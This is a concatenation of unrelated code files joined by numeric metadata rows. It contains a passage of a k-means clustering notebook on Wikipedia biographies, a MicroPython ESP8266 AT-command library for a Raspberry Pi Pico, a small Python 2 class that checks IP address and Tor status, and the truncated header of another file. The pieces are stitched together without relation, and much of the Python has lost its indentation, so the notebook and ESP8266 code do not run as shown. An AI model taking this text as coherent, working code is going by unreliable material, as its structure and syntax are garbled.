until later. Any expression appearing inside a lambda function doesn't get
evaluated until the function is called.
    Lazy evaluation is extremely important in memory-constrained settings, such as
an Amazon EC2 t2.micro instance.'''
centroids[k] = lambda k=k: arrays['centroids_{0:d}'.format(k)]
cluster_assignment[k] = lambda k=k: arrays['cluster_assignment_{0:d}'.format(k)]
score = compute_heterogeneity(tf_idf, k, centroids[k](), cluster_assignment[k]())
heterogeneity_values.append(score)
plot_k_vs_heterogeneity(k_list, heterogeneity_values)
else:
print('File not found. Skipping.')
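# Side note: the `k=k` default argument in the lambdas above is what makes the lazy loading work. Python closures capture variables by reference, so without the default every lambda would see the final value of `k` from the loop. A minimal standalone sketch (not part of the assignment) of the pitfall and the fix:
# In[ ]:
funcs_wrong = [lambda: k2 for k2 in [2, 10, 25]]
funcs_right = [lambda k2=k2: k2 for k2 in [2, 10, 25]]
print([f() for f in funcs_wrong])  # [25, 25, 25] -- every closure sees the last k2
print([f() for f in funcs_right])  # [2, 10, 25] -- the default captures each value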
# In the above plot we show that heterogeneity goes down as we increase the number of clusters. Does this mean we should always favor a higher K? **Not at all!** As we will see in the following section, setting K too high may end up separating data points that are actually pretty alike. At the extreme, we can set individual data points to be their own clusters (K=N) and achieve zero heterogeneity, but separating each data point into its own cluster is hardly a desirable outcome. In the following section, we will learn how to detect a K set "too large".
# ## Visualize clusters of documents
# Let's start visualizing some clustering results to see if we think the clustering makes sense. We can use such visualizations to help us assess whether we have set K too large or too small for a given application. Following the theme of this course, we will judge whether the clustering makes sense in the context of document analysis.
#
# What are we looking for in a good clustering of documents?
# * Documents in the same cluster should be similar.
# * Documents from different clusters should be less similar.
#
# So a bad clustering exhibits either of two symptoms:
# * Documents in a cluster have mixed content.
# * Documents with similar content are divided up and put into different clusters.
#
# To help visualize the clustering, we do the following:
# * Fetch nearest neighbors of each centroid from the set of documents assigned to that cluster. We will consider these documents as being representative of the cluster.
# * Print titles and first sentences of those nearest neighbors.
# * Print top 5 words that have highest tf-idf weights in each centroid.
# In[46]:
def visualize_document_clusters(wiki, tf_idf, centroids, cluster_assignment, k, map_index_to_word, display_content=True):
'''wiki: original dataframe
tf_idf: data matrix, sparse matrix format
    map_index_to_word: SFrame specifying the mapping between words and column indices
display_content: if True, display 8 nearest neighbors of each centroid'''
print('==========================================================')
# Visualize each cluster c
for c in xrange(k):
# Cluster heading
print('Cluster {0:d} '.format(c)),
# Print top 5 words with largest TF-IDF weights in the cluster
idx = centroids[c].argsort()[::-1]
for i in xrange(5): # Print each word along with the TF-IDF weight
print('{0:s}:{1:.3f}'.format(map_index_to_word['category'][idx[i]], centroids[c,idx[i]])),
print('')
if display_content:
# Compute distances from the centroid to all data points in the cluster,
# and compute nearest neighbors of the centroids within the cluster.
distances = pairwise_distances(tf_idf, centroids[c].reshape(1, -1), metric='euclidean').flatten()
distances[cluster_assignment!=c] = float('inf') # remove non-members from consideration
nearest_neighbors = distances.argsort()
# For 8 nearest neighbors, print the title as well as first 180 characters of text.
# Wrap the text at 80-character mark.
for i in xrange(8):
text = ' '.join(wiki[nearest_neighbors[i]]['text'].split(None, 25)[0:25])
print('\n* {0:50s} {1:.5f}\n {2:s}\n {3:s}'.format(wiki[nearest_neighbors[i]]['name'],
distances[nearest_neighbors[i]], text[:90], text[90:180] if len(text) > 90 else ''))
print('==========================================================')
# Let us first look at the 2 cluster case (K=2).
# In[48]:
'''Notice the extra pairs of parentheses for centroids and cluster_assignment.
The centroid and cluster_assignment are still inside the npz file,
and we need to explicitly indicate when to load them into memory.'''
visualize_document_clusters(wiki, tf_idf, centroids[2](), cluster_assignment[2](), 2, map_index_to_word)
# Both clusters have mixed content, although cluster 1 is much purer than cluster 0:
# * Cluster 0: artists, songwriters, professors, politicians, writers, etc.
# * Cluster 1: baseball players, hockey players, soccer (association football) players, etc.
#
# Top words of cluster 1 are all related to sports, whereas top words of cluster 0 show no clear pattern.
#
# Roughly speaking, the entire dataset was divided into athletes and non-athletes. It would be better if we sub-divided non-athletes into more categories. So let us use more clusters. How about `K=10`?
# In[49]:
k = 10
visualize_document_clusters(wiki, tf_idf, centroids[k](), cluster_assignment[k](), k, map_index_to_word)
# Clusters 0, 1, and 5 appear to be still mixed, but others are quite consistent in content.
# * Cluster 0: artists, actors, film directors, playwrights
# * Cluster 1: soccer (association football) players, rugby players
# * Cluster 2: track and field athletes
# * Cluster 3: baseball players
# * Cluster 4: professors, researchers, scholars
# * Cluster 5: Australian rules football players, American football players
# * Cluster 6: female figures from various fields
# * Cluster 7: composers, songwriters, singers, music producers
# * Cluster 8: ice hockey players
# * Cluster 9: politicians
#
# Clusters are now more pure, but some are qualitatively "bigger" than others. For instance, the category of scholars is more general than the category of baseball players. Increasing the number of clusters may split larger clusters. Another way to look at the size of the clusters is to count the number of articles in each cluster.
# In[50]:
np.bincount(cluster_assignment[10]())
# **Quiz Question**. Which of the 10 clusters above contains the greatest number of articles?
#
# 1. Cluster 0: artists, actors, film directors, playwrights
# 2. Cluster 4: professors, researchers, scholars
# 3. Cluster 5: Australian rules football players, American football players
# 4. Cluster 7: composers, songwriters, singers, music producers
# 5. Cluster 9: politicians
# **Quiz Question**. Which of the 10 clusters contains the least number of articles?
#
# 1. Cluster 1: soccer (association football) players, rugby players
# 2. Cluster 3: baseball players
# 3. Cluster 6: female figures from various fields
# 4. Cluster 7: composers, songwriters, singers, music producers
# 5. Cluster 8: ice hockey players
# There appears to be at least some connection between the topical consistency of a cluster and the number of its member data points.
# Let us visualize the case for K=25. For the sake of brevity, we do not print the content of documents. It turns out that the top words with highest TF-IDF weights in each cluster are representative of the cluster.
# In[51]:
visualize_document_clusters(wiki, tf_idf, centroids[25](), cluster_assignment[25](), 25,
map_index_to_word, display_content=False) # turn off text for brevity
# Looking at the representative examples and top words, we classify each cluster as follows. Notice the bolded items, which indicate the appearance of a new theme.
# * Cluster 0: **lawyers, judges, legal scholars**
# * Cluster 1: **professors, researchers, scholars (natural and health sciences)**
# * Cluster 2: ice hockey players
# * Cluster 3: politicians
# * Cluster 4: **government officials**
# * Cluster 5: politicians
# * Cluster 6: **professors, researchers, scholars (social sciences and humanities)**
# * Cluster 7: Canadian politicians
# * Cluster 8: **car racers**
# * Cluster 9: **economists**
# * Cluster 10: track and field athletes
# * Cluster 11: females from various fields
# * Cluster 12: (mixed; no clear theme)
# * Cluster 13: baseball players
# * Cluster 14: **painters, sculptors, artists**
# * Cluster 15: Australian rules football players, American football players
# * Cluster 16: **musicians, composers**
# * Cluster 17: soccer (association football) players, rugby players
# * Cluster 18: **poets**
# * Cluster 19: **film directors, playwrights**
# * Cluster 20: **songwriters, singers, music producers**
# * Cluster 21: **generals of U.S. Air Force**
# * Cluster 22: **music directors, conductors**
# * Cluster 23: **basketball players**
# * Cluster 24: **golf players**
#
# Indeed, increasing K achieved the desired effect of breaking up large clusters. Depending on the application, this may or may not be preferable to the K=10 analysis.
#
# Let's take it to the extreme and set K=100. We have a suspicion that this value is too large. Let us look at the top words from each cluster:
# In[53]:
k=100
visualize_document_clusters(wiki, tf_idf, centroids[k](), cluster_assignment[k](), k,
map_index_to_word, display_content=False)
# turn off text for brevity -- turn it on if you are curious ;)
# The class of soccer (association football) players has been broken into two clusters (44 and 45). The same goes for Australian rules football players (clusters 26 and 48). The class of baseball players has also been broken into two clusters (16 and 91).
#
# **A high value of K encourages pure clusters, but we cannot keep increasing K. For large enough K, related documents end up going to different clusters.**
#
# That said, the result for K=100 is not entirely bad. After all, it gives us separate clusters for such categories as Brazil, wrestling, computer science and the Mormon Church. If we set K somewhere between 25 and 100, we should be able to avoid breaking up clusters while discovering new ones.
#
# Also, we should ask ourselves how much **granularity** we want in our clustering. If we want a rough sketch of Wikipedia, we don't want overly detailed clusters. On the other hand, having many clusters can be valuable when we are zooming into a certain part of Wikipedia.
#
# **There is no golden rule for choosing K. It all depends on the particular application and domain we are in.**
#
# Another heuristic, one that does not rely so heavily on visualization (which can be hard in many applications, including this one!), is as follows: track heterogeneity versus K and look for the "elbow" of the curve, the value of K before which heterogeneity decreases rapidly and after which it decreases only gradually. This naturally trades off minimizing heterogeneity against keeping model complexity low. In the heterogeneity-versus-K plot made above, we did not yet see the curve flatten out, which might indicate that K=100 is indeed "reasonable" and that real overfitting only appears for even larger values of K (which are even harder to visualize using the methods we attempted above).
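# A rough sketch of automating the elbow heuristic (our own illustration, not part of the assignment): pick the K at which the heterogeneity curve bends most sharply, approximated by the largest second difference. This is crude, especially since our K values are not evenly spaced, but it mirrors what one looks for by eye.
# In[ ]:
def find_elbow(k_values, heterogeneity_values):
    # Second difference of heterogeneity; the largest bend is a crude
    # proxy for the "elbow". Requires at least 3 values of K.
    h = np.array(heterogeneity_values, dtype=float)
    second_diff = h[:-2] - 2*h[1:-1] + h[2:]
    return k_values[1 + np.argmax(second_diff)]
# Example (only meaningful after heterogeneity_values has been filled in above):
# print(find_elbow(k_list, heterogeneity_values))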
# **Quiz Question**. Another sign of too large K is having lots of small clusters. Look at the distribution of cluster sizes (by number of member data points). How many of the 100 clusters have fewer than 236 articles, i.e. 0.4% of the dataset?
#
# Hint: Use `cluster_assignment[100]()`, with the extra pair of parentheses for delayed loading.
# In[55]:
temp = cluster_assignment[100]()
count = 0
for i in range(100):
total = (temp == i).sum()
if total < 236:
count += 1
print(count)
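# The same count can also be obtained in a single vectorized expression (assuming the pre-computed arrays were loaded above):
# In[ ]:
print((np.bincount(cluster_assignment[100](), minlength=100) < 236).sum())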
# ### Takeaway
#
# Keep in mind, though, that tiny clusters aren't necessarily bad. A tiny cluster of documents that really look like each other is definitely preferable to a medium-sized cluster of documents with mixed content. However, having too few articles in a cluster may cause overfitting by reading too much into a limited pool of training data.
| 46.01873 | 725 | 0.707195 | 6,622 | 44,224 | 4.665811 | 0.166264 | 0.036864 | 0.011781 | 0.003625 | 0.221187 | 0.18361 | 0.162443 | 0.125935 | 0.109525 | 0.088326 | 0 | 0.022978 | 0.198964 | 44,224 | 960 | 726 | 46.066667 | 0.849203 | 0.64214 | 0 | 0.271375 | 0 | 0.003717 | 0.079207 | 0.015031 | 0 | 0 | 0 | 0.001042 | 0.007435 | 0 | null | null | 0.018587 | 0.040892 | null | null | 0.104089 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d316a1c92ea2eacd99036644096b71daf8954435 | 18,504 | py | Python | esp8266.py | mertaksoy/rpi-pico-micropython-esp8266-lib | b6500493294fc37719f6c5494b2ddd0882ac260c | [
"MIT"
] | 8 | 2021-12-30T18:31:26.000Z | 2022-03-22T01:11:29.000Z | esp8266.py | mertaksoy/rpi-pico-micropython-esp8266-lib | b6500493294fc37719f6c5494b2ddd0882ac260c | [
"MIT"
] | 1 | 2021-11-06T22:54:47.000Z | 2021-12-29T03:28:18.000Z | esp8266.py | mertaksoy/rpi-pico-micropython-esp8266-lib | b6500493294fc37719f6c5494b2ddd0882ac260c | [
"MIT"
] | 6 | 2021-09-28T06:35:59.000Z | 2022-01-10T10:36:41.000Z | from machine import UART, Pin
import time
from httpParser import HttpParser
ESP8266_OK_STATUS = "OK\r\n"
ESP8266_ERROR_STATUS = "ERROR\r\n"
ESP8266_FAIL_STATUS = "FAIL\r\n"
ESP8266_WIFI_CONNECTED="WIFI CONNECTED\r\n"
ESP8266_WIFI_GOT_IP_CONNECTED="WIFI GOT IP\r\n"
ESP8266_WIFI_DISCONNECTED="WIFI DISCONNECT\r\n"
ESP8266_WIFI_AP_NOT_PRESENT="WIFI AP NOT FOUND\r\n"
ESP8266_WIFI_AP_WRONG_PWD="WIFI AP WRONG PASSWORD\r\n"
ESP8266_BUSY_STATUS="busy p...\r\n"
UART_Tx_BUFFER_LENGTH = 1024
UART_Rx_BUFFER_LENGTH = 1024*2
class ESP8266:
"""
    This is a class for accessing the ESP8266 using AT commands.
    Using this class, you can access WiFi and do HTTP Post/Get operations.
    Attributes:
        uartPort (int): The UART port number of the RPi Pico's UART bus [Default UART0]
        baudRate (int): UART baud rate for communicating between the RPi Pico & ESP8266 [Default 115200]
        txPin (int): RPi Pico's Tx pin [Default Pin 0]
        rxPin (int): RPi Pico's Rx pin [Default Pin 1]
"""
__rxData=None
__txData=None
__httpResponse=None
def __init__(self, uartPort=0 ,baudRate=115200, txPin=(0), rxPin=(1)):
"""
        The constructor for the ESP8266 class.
        Parameters:
            uartPort (int): The UART port number of the RPi Pico's UART bus [Default UART0]
            baudRate (int): UART baud rate for communicating between the RPi Pico & ESP8266 [Default 115200]
            txPin (int): RPi Pico's Tx pin [Default Pin 0]
            rxPin (int): RPi Pico's Rx pin [Default Pin 1]
"""
self.__uartPort=uartPort
self.__baudRate=baudRate
self.__txPin=txPin
self.__rxPin=rxPin
#print(self.__uartPort, self.__baudRate, self.__txPin, self.__rxPin)
self.__uartObj = UART(self.__uartPort, baudrate=self.__baudRate, tx=Pin(self.__txPin), rx=Pin(self.__rxPin), txbuf=UART_Tx_BUFFER_LENGTH, rxbuf=UART_Rx_BUFFER_LENGTH)
#print(self.__uartObj)
def _createHTTPParseObj(self):
"""
        This is a private function that creates a fresh HTTP response parser
        before doing each HTTP Post/Get operation.
"""
if(self.__httpResponse != None):
del self.__httpResponse
self.__httpResponse=HttpParser()
else:
#del self.__httpResponse
self.__httpResponse=HttpParser()
def _sendToESP8266(self, atCMD, delay=1):
"""
        This is a private function that completes an ESP8266 AT command send/receive operation.
"""
self.__rxData=str()
self.__txData=atCMD
#print("---------------------------"+self.__txData)
self.__uartObj.write(self.__txData)
self.__rxData=bytes()
time.sleep(delay)
#while self.__uartObj.any()>0:
# self.__rxData += self.__uartObj.read(1)
while True:
#print(".")
if self.__uartObj.any()>0:
#print(self.__uartObj.any())
break
while self.__uartObj.any()>0:
self.__rxData += self.__uartObj.read(UART_Rx_BUFFER_LENGTH)
#print(self.__rxData)
if ESP8266_OK_STATUS in self.__rxData:
return self.__rxData
elif ESP8266_ERROR_STATUS in self.__rxData:
return self.__rxData
elif ESP8266_FAIL_STATUS in self.__rxData:
return self.__rxData
elif ESP8266_BUSY_STATUS in self.__rxData:
return "ESP BUSY\r\n"
else:
return None
def startUP(self):
"""
        This function is used to check the communication between the ESP8266 & RPi Pico.
        Return:
            True if communication with the ESP8266 succeeds
            False if unable to communicate with the ESP8266
"""
retData = self._sendToESP8266("AT\r\n")
if(retData != None):
if ESP8266_OK_STATUS in retData:
return True
else:
return False
        else:
            return False
def reStart(self):
"""
        This function is used to reset the ESP8266.
        Return:
            True if the reset completed successfully
            False if unable to reset the ESP8266
"""
retData = self._sendToESP8266("AT+RST\r\n")
if(retData != None):
if ESP8266_OK_STATUS in retData:
time.sleep(5)
#self.startUP()
return self.startUP()
else:
return False
        else:
            return False
def echoING(self, enable=False):
"""
        This function is used to enable/disable AT command echo [Default is False, disabling echo].
        Return:
            True if the echo on/off command was successfully initiated with the ESP8266
            False if the echo on/off command failed to initiate with the ESP8266
"""
if enable==False:
retData = self._sendToESP8266("ATE0\r\n")
if(retData != None):
if ESP8266_OK_STATUS in retData:
return True
else:
return False
else:
return False
else:
retData = self._sendToESP8266("ATE1\r\n")
if(retData != None):
if ESP8266_OK_STATUS in retData:
return True
else:
return False
else:
return False
def getVersion(self):
"""
        This function is used to get the AT command version details.
Return:
Version details on success else None
"""
retData = self._sendToESP8266("AT+GMR\r\n")
if(retData != None):
if ESP8266_OK_STATUS in retData:
#print(str(retData,"utf-8"))
retData = str(retData).partition(r"OK")[0]
#print(str(retData,"utf-8"))
retData = retData.split(r"\r\n")
retData[0] = retData[0].replace("b'","")
retData=str(retData[0]+"\r\n"+retData[1]+"\r\n"+retData[2])
return retData
else:
return None
else:
return None
def reStore(self):
"""
        This function is used to restore the ESP8266 to factory settings & delete previous configurations.
        Return:
            True if the ESP8266 was restored successfully
            False if the restore failed
"""
retData = self._sendToESP8266("AT+RESTORE\r\n")
if(retData != None):
if ESP8266_OK_STATUS in retData:
return True
else:
return False
else:
return None
"""
def chcekSYSRAM(self):
#retData = self._sendToESP8266("AT+SYSRAM?\r\n")
self.__rxData=b''
self.__txData="AT+SYSRAM?\r\n"
self.__uartObj.write(self.__txData)
self.__rxData=bytes()
time.sleep(2)
while self.__uartObj.any()>0:
self.__rxData += self.__uartObj.read(1)
print(self.__rxData.decode())
if ESP8266_OK_STATUS in self.__rxData:
return self.__rxData
else:
return 1
"""
def getCurrentWiFiMode(self):
"""
        This function is used to query the ESP8266 WiFi's current mode [STA: Station, SoftAP: Software Access Point, or both].
        Return:
            STA if the ESP8266 WiFi's current mode is configured as Station
            SoftAP if the ESP8266 WiFi's current mode is configured as SoftAP
            SoftAP+STA if the ESP8266 WiFi's current mode is configured as both Station & SoftAP
            None if the WiFi's current mode could not be detected
"""
retData = self._sendToESP8266("AT+CWMODE_CUR?\r\n")
if(retData != None):
if "1" in retData:
return "STA"
elif "2" in retData:
return "SoftAP"
elif "3" in retData:
return "SoftAP+STA"
else:
return None
else:
return None
def setCurrentWiFiMode(self, mode=3):
"""
        This function is used to set the ESP8266 WiFi's current mode [STA: Station, SoftAP: Software Access Point, or both].
Parameter:
mode (int): ESP8266 WiFi's [ 1: STA, 2: SoftAP, 3: SoftAP+STA(default)]
Return:
            True if the current WiFi mode was set successfully
            False if setting the current WiFi mode failed
"""
txData="AT+CWMODE_CUR="+str(mode)+"\r\n"
retData = self._sendToESP8266(txData)
if(retData!=None):
if ESP8266_OK_STATUS in retData:
return True
else:
return False
else:
return False
def getDefaultWiFiMode(self):
"""
        This function is used to query the ESP8266 WiFi's default mode [STA: Station, SoftAP: Software Access Point, or both].
        Return:
            STA if the ESP8266 WiFi's default mode is configured as Station
            SoftAP if the ESP8266 WiFi's default mode is configured as SoftAP
            SoftAP+STA if the ESP8266 WiFi's default mode is configured as both Station & SoftAP
            None if the WiFi's default mode could not be detected
"""
retData = self._sendToESP8266("AT+CWMODE_DEF?\r\n")
if(retData!=None):
if "1" in retData:
return "STA"
elif "2" in retData:
return "SoftAP"
elif "3" in retData:
return "SoftAP+STA"
else:
return None
else:
return None
def setDefaultWiFiMode(self, mode=3):
"""
        This function is used to set the ESP8266 WiFi's default mode [STA: Station, SoftAP: Software Access Point, or both].
Parameter:
mode (int): ESP8266 WiFi's [ 1: STA, 2: SoftAP, 3: SoftAP+STA(default)]
Return:
            True if the default WiFi mode was set successfully
            False if setting the default WiFi mode failed
"""
txData="AT+CWMODE_DEF="+str(mode)+"\r\n"
retData = self._sendToESP8266(txData)
if(retData!=None):
if ESP8266_OK_STATUS in retData:
return True
else:
return False
else:
return False
def getAvailableAPs(self):
"""
        This function is used to query the ESP8266 for available WiFi Access Points.
        Returns:
            List of available APs or None
"""
retData = str(self._sendToESP8266("AT+CWLAP\r\n", delay=10))
if(retData != None):
retData = retData.replace("+CWLAP:", "")
retData = retData.replace(r"\r\n\r\nOK\r\n", "")
retData = retData.replace(r"\r\n","@")
retData = retData.replace("b'(","(").replace("'","")
retData = retData.split("@")
retData =list(retData)
apLists=list()
for items in retData:
data=str(items).replace("(","").replace(")","").split(",")
data=tuple(data)
apLists.append(data)
return apLists
else:
return None
def connectWiFi(self,ssid,pwd):
"""
        This function is used to connect the ESP8266 to a WiFi Access Point.
        Parameters:
            ssid : WiFi AP's SSID
            pwd : WiFi AP's password
        Returns:
            WIFI DISCONNECT when the ESP8266 failed to connect with the target AP's credentials
            WIFI AP WRONG PASSWORD when the ESP8266 tried to connect to the target AP with a wrong password
            WIFI AP NOT FOUND when the ESP8266 cannot find the target AP
            WIFI CONNECTED when the ESP8266 successfully connects to the target AP
"""
txData="AT+CWJAP_CUR="+'"'+ssid+'"'+','+'"'+pwd+'"'+"\r\n"
#print(txData)
retData = self._sendToESP8266(txData, delay=15)
#print(".....")
#print(retData)
if(retData!=None):
if "+CWJAP" in retData:
if "1" in retData:
return ESP8266_WIFI_DISCONNECTED
elif "2" in retData:
return ESP8266_WIFI_AP_WRONG_PWD
elif "3" in retData:
return ESP8266_WIFI_AP_NOT_PRESENT
elif "4" in retData:
return ESP8266_WIFI_DISCONNECTED
else:
return None
elif ESP8266_WIFI_CONNECTED in retData:
if ESP8266_WIFI_GOT_IP_CONNECTED in retData:
return ESP8266_WIFI_CONNECTED
else:
return ESP8266_WIFI_DISCONNECTED
else:
return ESP8266_WIFI_DISCONNECTED
else:
return ESP8266_WIFI_DISCONNECTED
def disconnectWiFi(self):
"""
        This function is used to disconnect the ESP8266 from a connected WiFi Access Point.
        Return:
            False if disconnecting from the WiFi failed
            True if successfully disconnected
"""
retData = self._sendToESP8266("AT+CWQAP\r\n")
if(retData!=None):
if ESP8266_OK_STATUS in retData:
return True
else:
return False
else:
return False
def _createTCPConnection(self, link, port=80):
"""
        This function is used to create a connection between the ESP8266 and a host,
        just like creating a socket before completing the HTTP Get/Post operation.
        Return:
            False if creating the socket connection failed
            True if the socket connection was successfully created and established
"""
#self._sendToESP8266("AT+CIPMUX=0")
txData="AT+CIPSTART="+'"'+"TCP"+'"'+','+'"'+link+'"'+','+str(port)+"\r\n"
#print(txData)
retData = self._sendToESP8266(txData)
#print(".....")
#print(retData)
if(retData != None):
if ESP8266_OK_STATUS in retData:
return True
else:
return False
        else:
            return False
def doHttpGet(self,host,path,user_agent="RPi-Pico", port=80):
"""
        This function is used to complete an HTTP GET operation.
        Parameter:
            host (str): Host URL [ex: GET operation URL: www.httpbin.org/ip. So, the host URL is only "www.httpbin.org"]
            path (str): GET operation's URL path [ex: GET operation URL: www.httpbin.org/ip. So, the path is "/ip"]
            user_agent (str): User-Agent name [Default "RPi-Pico"]
            port (int): HTTP port number [Default port number 80]
        Return:
            HTTP status code & HTTP response [if the status is not equal to 200 then the response is None]
            On failure, returns 0 and None
"""
if(self._createTCPConnection(host, port) == True):
self._createHTTPParseObj()
#getHeader="GET "+path+" HTTP/1.1\r\n"+"Host: "+host+":"+str(port)+"\r\n"+"User-Agent: "+user_agent+"\r\n"+"\r\n";
getHeader="GET "+path+" HTTP/1.1\r\n"+"Host: "+host+"\r\n"+"User-Agent: "+user_agent+"\r\n"+"\r\n";
#print(getHeader,len(getHeader))
txData="AT+CIPSEND="+str(len(getHeader))+"\r\n"
retData = self._sendToESP8266(txData)
if(retData != None):
if ">" in retData:
retData = self._sendToESP8266(getHeader, delay=2)
self._sendToESP8266("AT+CIPCLOSE\r\n")
retData=self.__httpResponse.parseHTTP(retData)
return retData, self.__httpResponse.getHTTPResponse()
else:
return 0, None
else:
return 0, None
else:
self._sendToESP8266("AT+CIPCLOSE\r\n")
return 0, None
    def doHttpPost(self, host, path, content_type, content, user_agent="RPi-Pico", port=80):
"""
        This function is used to complete an HTTP POST operation.
        Parameter:
            host (str): Host URL [ex: operation URL: www.httpbin.org/ip. So, the host URL is only "www.httpbin.org"]
            path (str): POST operation's URL path [ex: operation URL: www.httpbin.org/ip. So, the path is "/ip"]
            content_type (str): POST operation's upload content type [ex. "application/json", "application/x-www-form-urlencoded", "text/plain"]
            content (str): POST operation's upload content
            user_agent (str): User-Agent name [Default "RPi-Pico"]
            port (int): HTTP port number [Default port number 80]
        Return:
            HTTP status code & HTTP response [if the status is not equal to 200 then the response is None]
            On failure, returns 0 and None
"""
if(self._createTCPConnection(host, port) == True):
self._createHTTPParseObj()
postHeader="POST "+path+" HTTP/1.1\r\n"+"Host: "+host+"\r\n"+"User-Agent: "+user_agent+"\r\n"+"Content-Type: "+content_type+"\r\n"+"Content-Length: "+str(len(content))+"\r\n"+"\r\n"+content+"\r\n";
#print(postHeader,len(postHeader))
txData="AT+CIPSEND="+str(len(postHeader))+"\r\n"
retData = self._sendToESP8266(txData)
if(retData != None):
if ">" in retData:
retData = self._sendToESP8266(postHeader, delay=2)
#print(".......@@",retData)
self._sendToESP8266("AT+CIPCLOSE\r\n")
#print(self.__httpResponse)
retData=self.__httpResponse.parseHTTP(retData)
return retData, self.__httpResponse.getHTTPResponse()
else:
return 0, None
else:
return 0, None
else:
self._sendToESP8266("AT+CIPCLOSE\r\n")
return 0, None
def __del__(self):
"""
        The destructor for the ESP8266 class.
"""
print('Destructor called, ESP8266 deleted.')
pass
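# A minimal usage sketch, assuming this module runs on a RPi Pico wired to an
# ESP8266 on UART0 (Tx=GP0, Rx=GP1); "MySSID", "MyPassword" and the httpbin
# host are placeholders, not values defined by this library.
if __name__ == "__main__":
    esp = ESP8266(uartPort=0, baudRate=115200, txPin=0, rxPin=1)
    if esp.startUP():
        print(esp.getVersion())
        print(esp.connectWiFi("MySSID", "MyPassword"))
        statusCode, response = esp.doHttpGet("www.httpbin.org", "/ip")
        print(statusCode)
        print(response)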
| 36.497041 | 209 | 0.541829 | 2,084 | 18,504 | 4.682822 | 0.130998 | 0.010862 | 0.046726 | 0.023056 | 0.626294 | 0.559586 | 0.49544 | 0.466646 | 0.447177 | 0.424121 | 0 | 0.04262 | 0.362192 | 18,504 | 507 | 210 | 36.497041 | 0.784274 | 0.039721 | 0 | 0.577519 | 0 | 0 | 0.069619 | 0 | 0.015504 | 0 | 0 | 0 | 0 | 0 | null | null | 0.007752 | 0.011628 | null | null | 0.003876 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d31d05d65e96e8eb5e6db72874f6fcc4ab556220 | 2,325 | py | Python | http/torcheck.py | k11dd00/oniongen | 00d7992920c59de4a5584357a35494fbdde0a6d9 | [
"MIT"
] | null | null | null | http/torcheck.py | k11dd00/oniongen | 00d7992920c59de4a5584357a35494fbdde0a6d9 | [
"MIT"
] | 1 | 2021-11-09T02:38:38.000Z | 2021-11-09T02:38:38.000Z | http/torcheck.py | k11dd00/oniongen | 00d7992920c59de4a5584357a35494fbdde0a6d9 | [
"MIT"
] | null | null | null | # MIT License
#
# Copyright (c) 2018 k1dd00
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE
# -*- coding: utf-8; mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vim: fileencoding=utf-8 tabstop=4 expandtab shiftwidth=4
# pylint: disable=C0103,C0301,W1202,W0212
import urllib2
from BeautifulSoup import BeautifulSoup
class TorCheck(object):
"""
The TorCheck class.
    This class checks the Tor status and the current IP address.
"""
IP_CHECK_ENDPOINT = "http://icanhazip.com"
TOR_CHECK_ENDPOINT = "https://check.torproject.org"
def __init__(self):
self.text_key = "congratulations"
def check_ip(self):
"""
        Checks the current IP address.
Returns
-------
ip: str
The ip address
"""
request = urllib2.urlopen(self.IP_CHECK_ENDPOINT)
response = request.read()
return response.strip()
def check_tor_status(self):
"""
        Checks the Tor status.
Returns
-------
status: Bool
The tor status
"""
html = urllib2.urlopen(self.TOR_CHECK_ENDPOINT).read()
        parsed_html = BeautifulSoup(html)
content = parsed_html.body.find('h1', attrs={'class':'not'}).text
return self.text_key in content.lower()
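# A minimal usage sketch (assumes network access; prints the current IP
# address and whether the connection appears to go through Tor):
if __name__ == "__main__":
    checker = TorCheck()
    print "IP address:", checker.check_ip()
    print "Using Tor:", checker.check_tor_status()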
| 32.746479 | 81 | 0.68086 | 309 | 2,325 | 5.061489 | 0.521036 | 0.056266 | 0.023018 | 0.023018 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017988 | 0.234839 | 2,325 | 70 | 82 | 33.214286 | 0.861158 | 0.619785 | 0 | 0 | 0 | 0 | 0.099863 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1875 | false | 0 | 0.125 | 0 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
d322e920e430d42433aea1129d02e77e626557b0 | 21,922 | py | Python | desicos/abaqus/gui/gui_commands.py | saullocastro/desicos | 922db8ac4fb0fb4d09df18ce2a14011f207f6fa8 | [
"BSD-3-Clause"
] | 1 | 2020-10-22T22:15:24.000Z | 2020-10-22T22:15:24.000Z | desicos/abaqus/gui/gui_commands.py | saullocastro/desicos | 922db8ac4fb0fb4d09df18ce2a14011f207f6fa8 | [
"BSD-3-Clause"
